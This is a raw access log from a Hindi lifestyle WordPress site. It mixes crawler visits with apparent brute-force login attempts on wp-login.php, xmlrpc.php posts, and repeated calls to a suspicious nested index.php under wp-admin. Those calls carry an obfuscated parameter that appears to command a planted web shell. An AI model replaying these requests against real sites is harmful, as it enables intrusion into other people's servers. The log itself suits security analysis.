91.121.34.215 - - [20/Oct/2025:08:46:52 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15"
101.53.145.3 - - [20/Oct/2025:08:46:55 -0400] "POST /wp-login.php HTTP/2.0" 200 7088 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:46:54 -0400] "GET /tag/various-benefits-of-oily-skin/ HTTP/2.0" 200 149420 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
91.121.34.215 - - [20/Oct/2025:08:46:59 -0400] "POST /wp-login.php HTTP/2.0" 200 7149 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15"
216.73.216.143 - - [20/Oct/2025:08:47:01 -0400] "GET /?p=18659 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:47:01 -0400] "GET /amazing-health-benefits-of-eating-cashew-nuts/ HTTP/2.0" 200 315792 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:47:02 -0400] "GET /amazing-benefits-of-tea-bags/ HTTP/2.0" 200 318797 "https://hindi.blushin.com/?p=18659" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:44:40 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373838302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343238302q3163633839636533653231356335376132353934656135626265313261393664222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
66.249.73.73 - - [20/Oct/2025:08:47:08 -0400] "GET /how-to-celebrate-bhai-dooj/bhai-dooj-festival-2/?noamp=mobile&amp HTTP/2.0" 200 200500 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:47:11 -0400] "GET /rasmalai-recipe/ HTTP/2.0" 200 310485 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:47:12 -0400] "GET /tag/recipe-of-punjabi-chole-bhature-in-hindi HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.33.109.164 - - [20/Oct/2025:08:47:13 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
14.191.138.7 - - [20/Oct/2025:08:47:13 -0400] "GET /?b=4101136960d18b4e HTTP/2.0" 200 229596 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:47:13 -0400] "GET /tag/recipe-of-punjabi-chole-bhature-in-hindi/ HTTP/2.0" 200 149744 "https://hindi.blushin.com/tag/recipe-of-punjabi-chole-bhature-in-hindi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.33.109.164 - - [20/Oct/2025:08:47:17 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
45.5.195.67 - - [20/Oct/2025:08:47:16 -0400] "GET /tag/healthy-heart/ HTTP/2.0" 200 149963 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:47:20 -0400] "GET /beautiful-mehndi-designs-for-this-rakshabandhan/ HTTP/2.0" 200 313599 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:47:26 -0400] "GET /tag/love-meter-in-hindi HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:45:02 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373930322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343330322q6262356139303831643634353562366233303231616132616438646566653864222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:08:47:27 -0400] "GET /tag/love-meter-in-hindi/ HTTP/2.0" 200 149535 "https://hindi.blushin.com/tag/love-meter-in-hindi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:47:30 -0400] "GET /use-honey-this-way-to-get-rid-of-heat/ HTTP/2.0" 200 313227 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
85.208.96.208 - - [20/Oct/2025:08:47:31 -0400] "GET /tag/superfoods-for-hair-and-skin/ HTTP/2.0" 200 150001 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
43.173.180.185 - - [20/Oct/2025:08:47:32 -0400] "GET /tag/how-to-get-rid-of-delayed-periods HTTP/2.0" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36"
43.173.180.185 - - [20/Oct/2025:08:47:33 -0400] "GET /tag/how-to-get-rid-of-delayed-periods/ HTTP/2.0" 200 149997 "https://hindi.blushin.com/tag/how-to-get-rid-of-delayed-periods" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:47:37 -0400] "GET /tag/effects-of-heat-waves HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:47:38 -0400] "GET /tag/effects-of-heat-waves/ HTTP/2.0" 200 149502 "https://hindi.blushin.com/tag/effects-of-heat-waves" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:47:41 -0400] "GET /effective-solution-that-will-never-let-you-be-short-of-money/ HTTP/2.0" 200 318542 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
185.191.171.17 - - [20/Oct/2025:08:47:45 -0400] "GET /tag/raisin-for-ailments/ HTTP/2.0" 200 149364 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.116.199.115 - - [20/Oct/2025:08:45:24 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373932342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343332342q6431356238623261386539626264326239663630313931326237343061636134222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:47:50 -0400] "GET /know-the-recipe-to-make-macaroni-squares-at-home/ HTTP/2.0" 200 309540 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:47:52 -0400] "GET /tag/how-to-straighten-your-hair-naturally/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
165.232.131.12 - - [20/Oct/2025:08:47:53 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.96.194 - - [20/Oct/2025:08:47:52 -0400] "GET /tag/money-making-hacks/ HTTP/2.0" 200 149748 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:47:53 -0400] "GET /tag/how-to-straighten-your-hair-naturally/feed/ HTTP/2.0" 200 9981 "https://hindi.blushin.com/tag/how-to-straighten-your-hair-naturally/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
165.232.131.12 - - [20/Oct/2025:08:47:56 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.33.109.195 - - [20/Oct/2025:08:47:58 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.33.109.195 - - [20/Oct/2025:08:47:59 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
205.196.217.53 - - [20/Oct/2025:08:48:00 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
185.191.171.10 - - [20/Oct/2025:08:47:58 -0400] "GET /tag/tasty-idli-fry/ HTTP/2.0" 200 149263 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
205.196.217.53 - - [20/Oct/2025:08:48:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7145 "https://hindi.blushin.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
31.220.92.9 - - [20/Oct/2025:08:48:02 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:48:00 -0400] "GET /relationship-tips-to-help-you-understand-the-things-that-annoy-your-husband/ HTTP/2.0" 200 314771 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
31.220.92.9 - - [20/Oct/2025:08:48:03 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
50.21.186.206 - - [20/Oct/2025:08:48:05 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:48:08 -0400] "GET /tag/sad-pic-for-whatsapp HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:48:09 -0400] "GET /tag/sad-pic-for-whatsapp/ HTTP/2.0" 200 149594 "https://hindi.blushin.com/tag/sad-pic-for-whatsapp" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:48:11 -0400] "GET /these-celebrities-pay-off-for-disrespecting-the-national-flag/ HTTP/2.0" 200 317365 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:45:46 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373934362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343334362q3636623366316638623666646133663566623165653638376436396663663434222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:48:20 -0400] "GET /these-navratri-solutions-will-relieve-you-from-all-the-life-problems/ HTTP/2.0" 200 314261 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
40.77.167.77 - - [20/Oct/2025:08:48:23 -0400] "GET /homemade-rakhi-for-your-brothers.html/om-rakhi HTTP/2.0" 200 195274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
177.183.119.19 - - [20/Oct/2025:08:48:27 -0400] "GET /tag/affairs-of-bollywood-celebrities/ HTTP/2.0" 200 149740 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:48:30 -0400] "GET /to-get-this-job-with-67-lakhs-salary-you-need-to-date-your-boss/ HTTP/2.0" 200 313115 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:46:08 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373936382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343336382q3464323636313336366465326631623137323161616133366330663730333539222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
195.26.249.212 - - [20/Oct/2025:08:48:37 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
216.244.66.235 - - [20/Oct/2025:08:48:39 -0400] "GET /adopt-these-tips-to-become-an-adorable-daughter-in-law/ HTTP/2.0" 200 315290 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
85.208.96.203 - - [20/Oct/2025:08:48:41 -0400] "GET /tag/comfortable-airport-outfits/ HTTP/2.0" 200 149919 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:48:49 -0400] "GET /this-hair-oil-made-of-natural-ingredients-makes-your-hair-beautiful/ HTTP/2.0" 200 310336 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:46:30 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373939302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343339302q6432626531313037313261346631333336376262386434313833323939633337222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:48:59 -0400] "GET /ayurvedic-tips-to-get-glowing-skin/ HTTP/2.0" 200 312986 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:49:01 -0400] "GET /use-these-tips-to-please-your-husband HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
185.191.171.12 - - [20/Oct/2025:08:49:02 -0400] "GET /tag/how-to-make-milk-more-healthy/ HTTP/2.0" 200 152276 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:49:02 -0400] "GET /use-these-tips-to-please-your-husband/ HTTP/2.0" 200 316030 "https://hindi.blushin.com/use-these-tips-to-please-your-husband" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
2a03:2880:f800:31:: - - [20/Oct/2025:08:49:08 -0400] "GET /tag/drinking-warm-water-good-for-constipation/ HTTP/2.0" 200 149659 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.244.66.235 - - [20/Oct/2025:08:49:08 -0400] "GET /lemon-tea-to-give-facial-glow/ HTTP/2.0" 200 313345 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
91.98.65.63 - - [20/Oct/2025:08:49:15 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:49:17 -0400] "GET /homemade-face-masks-to-get-rid-of-dark-circles-and-blemishes HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
185.191.171.7 - - [20/Oct/2025:08:49:17 -0400] "GET /tag/how-to-stop-period-pain-naturally/ HTTP/2.0" 200 149791 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
203.210.237.200 - - [20/Oct/2025:08:49:19 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:49:18 -0400] "GET /nutritious-diet-for-your-children-physical-and-mental-health/ HTTP/2.0" 200 324272 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:49:18 -0400] "GET /homemade-face-masks-to-get-rid-of-dark-circles-and-blemishes/ HTTP/2.0" 200 316438 "https://hindi.blushin.com/homemade-face-masks-to-get-rid-of-dark-circles-and-blemishes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
203.210.237.200 - - [20/Oct/2025:08:49:20 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
154.53.62.61 - - [20/Oct/2025:08:49:23 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.7 - - [20/Oct/2025:08:49:23 -0400] "GET /tag/kitchen-remedies-for-weight-loss/ HTTP/2.0" 200 152216 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
162.0.229.109 - - [20/Oct/2025:08:49:27 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
162.0.229.109 - - [20/Oct/2025:08:49:29 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:46:52 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936383031322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343431322q3863373332316434646636613038643430396663346235326662363139333933222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:08:49:33 -0400] "GET /tag/kuttu-in-hindi/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
154.53.62.61 - - [20/Oct/2025:08:49:35 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:49:34 -0400] "GET /tag/kuttu-in-hindi/feed/ HTTP/2.0" 200 7721 "https://hindi.blushin.com/tag/kuttu-in-hindi/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
195.26.249.212 - - [20/Oct/2025:08:49:38 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
195.26.249.212 - - [20/Oct/2025:08:49:38 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
116.179.32.172 - - [20/Oct/2025:08:49:38 -0400] "GET /tips-to-get-rid-of-moles.html HTTP/2.0" 404 164295 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
40.77.167.77 - - [20/Oct/2025:08:49:42 -0400] "GET /tips-to-make-your-partner-fall-for-you.html/%E0%A4%86%E0%A4%AA%E0%A4%95%E0%A5%80-%E0%A4%9D%E0%A5%80%E0%A4%B2-%E0%A4%B8%E0%A5%80-%E0%A4%86%E0%A4%82%E0%A4%96%E0%A5%87 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.240.48.171 - - [20/Oct/2025:08:49:51 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
162.240.38.165 - - [20/Oct/2025:08:49:51 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MAFSJS; rv:11.0) like Gecko"
162.240.38.165 - - [20/Oct/2025:08:49:54 -0400] "POST /wp-login.php HTTP/2.0" 200 7149 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MAFSJS; rv:11.0) like Gecko"
192.252.215.2 - - [20/Oct/2025:08:49:53 -0400] "GET /beauty-benefits-of-milk.html HTTP/2.0" 404 164295 "https://hindi.blushin.com/beauty-benefits-of-milk.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
154.53.62.61 - - [20/Oct/2025:08:49:55 -0400] "POST /xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; SLCC2; Media Center PC 6.0)"
66.116.199.115 - - [20/Oct/2025:08:47:29 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936383034392p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343434392q3065373735313831653932383732346135626265623266376538313737633635222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
192.252.215.2 - - [20/Oct/2025:08:49:56 -0400] "GET / HTTP/2.0" 200 229596 "https://hindi.blushin.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
